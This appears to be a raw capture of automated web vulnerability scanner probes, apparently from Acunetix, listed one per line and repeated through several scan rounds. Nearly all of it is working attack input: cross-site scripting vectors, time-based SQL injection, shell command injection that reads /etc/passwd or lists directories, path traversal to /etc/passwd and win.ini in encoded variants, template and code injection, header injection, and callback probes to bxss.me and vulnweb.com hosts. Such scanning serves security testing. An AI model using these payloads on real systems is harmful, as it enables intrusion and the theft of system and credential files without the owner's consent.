1<video><source onerror="javascript:prompt(964844)">

"+response.write(9990914*9714155)+"

../../../../../../../../../../etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902136)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

1<div style=width:expression(prompt(963463))>

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd.jpg

1

1

cat /etc/passwd

1

1<body onload=prompt(966959)>

WEB-INF\web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99675+99581}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998041)>

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n922994=v974243

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

1<img src=xyz OnErRor=prompt(985454)>

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

-1)

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(915587)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

!(()&&!|*|*|

-1))

'"()

1

testasp.vulnweb.com

1<ScRiPt%20>prompt(930942)</sCripT>

1

^(#$!@#$)(()))******

/etc/passwd

1

x4nWTP2e'

1

1

1

1&lt

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

Rc1h3iFw')

1

1

1

"

\xf6<img acu onmouseover=prompt(941160) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

5N1dKTwJ'))

"

1

1

1<input autofocus onfocus=prompt(927680)>

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

-1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

http://hitNrfjhxKwAV.bxss.me/

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

&dir

-1)

1

acunetix_wvs_invalid_filename

1_7ciXa <ScRiPt >prompt(955418)</ScRiPt>

1

1

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

'&dir&'

1

1

file:///etc/passwd

1

nXtpGFnH'

/\../\../\../\../\../\../\../etc/passwd

1

comments

1

1

"&dir&"

http://www.acunetix.tst

1

E72HwRN6')

'"

1

1'"()&%<ScRiPt >prompt(990040)</ScRiPt>

comments/.

WEB-INF/web.xml

1

|dir

1

1

lZvNQQaA'))

<!--

'"()&%<ScRiPt >prompt(919931)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1_923795

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

acu3749\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3749

..\..\..\..\..\..\..\..\windows\win.ini

acux2556\xc0\xbez1\xc0\xbcz2a\x90bcxuca2556

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(990585)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(920137)</script>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(977328)</ScRiPt>

1

response.write(9927716*9024735)

1

1

1

'+response.write(9927716*9024735)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995864></ScRiPt>

1

&cat /etc/passwd&

1

1

"+response.write(9927716*9024735)+"

1

WEB-INF/web.xml

1<ScRiPt >prompt(973465)</ScRiPt>

'&cat /etc/passwd&'

1

1

1

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1<video><source onerror="javascript:prompt(930695)">

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981559)"></g></svg>

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(912355))>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

${99432+99688}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<iframe src='data:text/html

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1

1

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(908110)>

1&n988746=v902667

1

-1)

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934653)>

)

testasp.vulnweb.com

-1))

1

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img src=xyz OnErRor=prompt(914860)>

'"()

!(()&&!|*|*|

US30g01o'

1

1

1

^(#$!@#$)(()))******

1<img/src=">" onerror=alert(963889)>

'

/etc/passwd

1

AUCnL5hG')

1

1<ScRiPt%20>prompt(902915)</sCripT>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

lw9blOrt'))

1&lt

1

1

1

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1

\xf6<img acu onmouseover=prompt(987072) //\xf6>

1

http://hitzeaGjcfYNn.bxss.me/

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<input autofocus onfocus=prompt(910002)>

-1)

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1))

1

1

1

http://www.acunetix.tst

comments

1

&dir

[url=http://www.acunetix.com]website security[/url]

obzwR4WM'

file:///etc/passwd

1

'"

comments/.

1'"()&%<ScRiPt >prompt(971061)</ScRiPt>

0SHTbcmO')

'&dir&'

1_bGvs5 <ScRiPt >prompt(934833)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

nthzqVy7'))

'"()&%<ScRiPt >prompt(943618)</ScRiPt>

1

"&dir&"

1

1

1

WEB-INF/web.xml

1

1

1_943697

1

1

|dir

1

1

1

1

WEB-INF\web.xml

1

'|dir

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu1660\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1660

1

1

................windowswin.ini

1

acux5889\xc0\xbez1\xc0\xbcz2a\x90bcxuca5889

1

1

1<ScRiPt >prompt(985774)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(938533)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9859998*9982560)

1<ScRiPt >prompt(923226)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996649></ScRiPt>

'+response.write(9859998*9982560)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(936939)</ScRiPt>

&cat /etc/passwd&

"+response.write(9859998*9982560)+"

1

1

1

1<video><source onerror="javascript:prompt(990773)">

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989115)"></g></svg>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

WEB-INF\web.xml

1

1<div style=width:expression(prompt(930151))>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

${99600+99181}

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n958674=v914658

1

`cat /etc/passwd`

1<body onload=prompt(929768)>

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984347)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(997091)>

'|'ld

'"()

testasp.vulnweb.com

1

1

1<img/src=">" onerror=alert(966676)>

XG4sgrkP'

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1

"|"ld

1

1<ScRiPt%20>prompt(996258)</sCripT>

AAJGiHL7')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1

1

1

RRUJHs0P'))

1

1&lt

/etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(957101) //\xf6>

'

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitKdk9mO1Y5I.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(977166)>

1

acunetix_wvs_invalid_filename

1

1

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

1'"()&%<ScRiPt >prompt(903742)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

'"

comments

CPeYZAdD'

1

1_hqcVR <ScRiPt >prompt(999025)</ScRiPt>

'"()&%<ScRiPt >prompt(968351)</ScRiPt>

1

CYQDRXtP')

||cat /etc/passwd

comments/.

<!--

1

1

1_993086

1

1

file:///etc/passwd

1

NzAAyRSZ'))

1

1

&dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'&dir&'

1

WEB-INF/web.xml

1

"&dir&"

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

|dir

acu5896\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5896

'|dir

1

../../../../../../../../../../boot.ini

acux2685\xc0\xbez1\xc0\xbcz2a\x90bcxuca2685

1

1

1<ScRiPt >prompt(996916)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

1<script>prompt(943266)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(934055)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941937></ScRiPt>

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(927769)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

response.write(9996670*9623594)

1

1

1<video><source onerror="javascript:prompt(980946)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'+response.write(9996670*9623594)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964738)"></g></svg>

1

"+response.write(9996670*9623594)+"

&cat /etc/passwd&

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(928404))>

1

'&cat /etc/passwd&'

1

1

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1<body onload=prompt(994344)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

${99927+99099}

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909956)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1

1

-1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(976511)>

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1&n993778=v941614

)

|cat /etc/passwd#

-1)

1

1<img/src=">" onerror=alert(989496)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

-1))

1

1

'|'ld

1<ScRiPt%20>prompt(974714)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

bsjQhIC8'

1

kGaaQzjc')

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

testasp.vulnweb.com

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(938877) //\xf6>

1

v27ur9u4'))

'

'"()

1

1

1

1

/etc/passwd

1<input autofocus onfocus=prompt(922773)>

-1

"

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

'

-1)

1

[url=http://www.acunetix.com]website security[/url]

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1_XzM83 <ScRiPt >prompt(988309)</ScRiPt>

1

1

1

1

1

g35Wgxbb'

1

acunetix_wvs_invalid_filename

http://hitMyonrhG7FK.bxss.me/

||cat /etc/passwd

1

6qCIYUaU')

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

&dir

1

gv8vjxf9'))

1

1

1

comments

1

http://www.acunetix.tst

'&dir&'

'"

1

1'"()&%<ScRiPt >prompt(907544)</ScRiPt>

1

comments/.

<!--

1

"&dir&"

1

'"()&%<ScRiPt >prompt(928319)</ScRiPt>

1

1

|dir

1

1_963987

1

1

file:///etc/passwd

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acu9626\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9626

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux9213\xc0\xbez1\xc0\xbcz2a\x90bcxuca9213

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(942715)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(906699)</script>

1

response.write(9529482*9496077)

1

1

1

'+response.write(9529482*9496077)+'

1<ScRiPt >prompt(936477)</ScRiPt>

&cat /etc/passwd&

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9529482*9496077)+"

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932264></ScRiPt>

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(905562)</ScRiPt>

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(988521)">

1

if(now()=sysdate(),sleep(3.359),0)/*'XOR(if(now()=sysdate(),sleep(3.359),0))OR'"XOR(if(now()=sysdate(),sleep(3.359),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1

${99470+99226}

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985461)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

(select(0)from(select(sleep(3.359)))v)/*'+(select(0)from(select(sleep(3.359)))v)+'"+(select(0)from(select(sleep(3.359)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1&n973379=v985934

1<div style=width:expression(prompt(986843))>

1some_inexistent_file_with_long_name%00.jpg

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

WEB-INF/web.xml

'|'ld

1

1

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

WEB-INF\web.xml

testasp.vulnweb.com

^(#$!@#$)(()))******

1<body onload=prompt(971772)>

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947170)>

1

1

1

1

afAjJFcQ'

1<img src=xyz OnErRor=prompt(996355)>

1

1

1

/etc/passwd

'"()

hSq4X0uU')

1

'

1

1<img/src=">" onerror=alert(913445)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

EEVJA0vf'))

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<ScRiPt%20>prompt(909753)</sCripT>

1

"

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1&lt

-1)

1

1

acunetix_wvs_invalid_filename

http://hitJSsjtb1JBX.bxss.me/

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

\xf6<img acu onmouseover=prompt(975502) //\xf6>

-1))

1

1

comments

1

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

UIjFap08'

1<input autofocus onfocus=prompt(936853)>

http://www.acunetix.tst

1

1

'"

comments

'&dir&'

1'"()&%<ScRiPt >prompt(948949)</ScRiPt>

GBowa3Q0')

<a href='http://www.acunetix.com'>website security</a>

file:///etc/passwd

'"()&%<ScRiPt >prompt(948397)</ScRiPt>

1

"&dir&"

comments/.

<!--

[url=http://www.acunetix.com]website security[/url]

eo8CXZVL'))

1

|dir

1

1_aE1jm <ScRiPt >prompt(917147)</ScRiPt>

1_968083

1

1

1

1

1

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

1

acu3445\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3445

1

../../../../../../../../../../windows/win.ini

1

1

1

acux1542\xc0\xbez1\xc0\xbcz2a\x90bcxuca1542

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(904070)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(950262)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(983826)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969091></ScRiPt>

1

1

1<ScRiPt >prompt(995665)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(958434)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946860)"></g></svg>

1

1

response.write(9551022*9328753)

1<div style=width:expression(prompt(951761))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'+response.write(9551022*9328753)+'

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

"+response.write(9551022*9328753)+"

1

1

1<body onload=prompt(918168)>

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952270)>

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(942094)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(936254)>

${100356+99540}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(919346)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1&lt

1&n987317=v903392

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

-1)

1

1

\xf6<img acu onmouseover=prompt(962003) //\xf6>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

testasp.vulnweb.com

1

1

1<input autofocus onfocus=prompt(912092)>

!(()&&!|*|*|

KKyobPzg'

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

<a href='http://www.acunetix.com'>website security</a>

1

nhscRs2m')

^(#$!@#$)(()))******

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

[url=http://www.acunetix.com]website security[/url]

1

1

0S28dxSc'))

1

1

/etc/passwd

'

"

1_u5XLE <ScRiPt >prompt(911137)</ScRiPt>

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

${@print(md5(acunetix_wvs_security_test))}

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

||cat /etc/passwd

http://hiteFyyP3sNSA.bxss.me/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

1

-1))

1

1

1

1

&dir

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://www.acunetix.tst

cD6o9mhl'

1

'"

1'"()&%<ScRiPt >prompt(923217)</ScRiPt>

1

comments

'&dir&'

1OT28epS')

<!--

'"()&%<ScRiPt >prompt(934036)</ScRiPt>

1

comments/.

1

1

"&dir&"

1

4nhg10T6'))

1_967878

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

|dir

1

1

1

'|dir

1

1

"|dir

file:///etc/passwd

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

acu7596\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7596

1

1

1

../../../../../../../../../../windows/win.ini

1

acux6295\xc0\xbez1\xc0\xbcz2a\x90bcxuca6295

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(999108)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(968993)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(964924)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995973></ScRiPt>

................windowswin.ini

1

1

1

&cat /etc/passwd&

1

response.write(9617478*9087053)

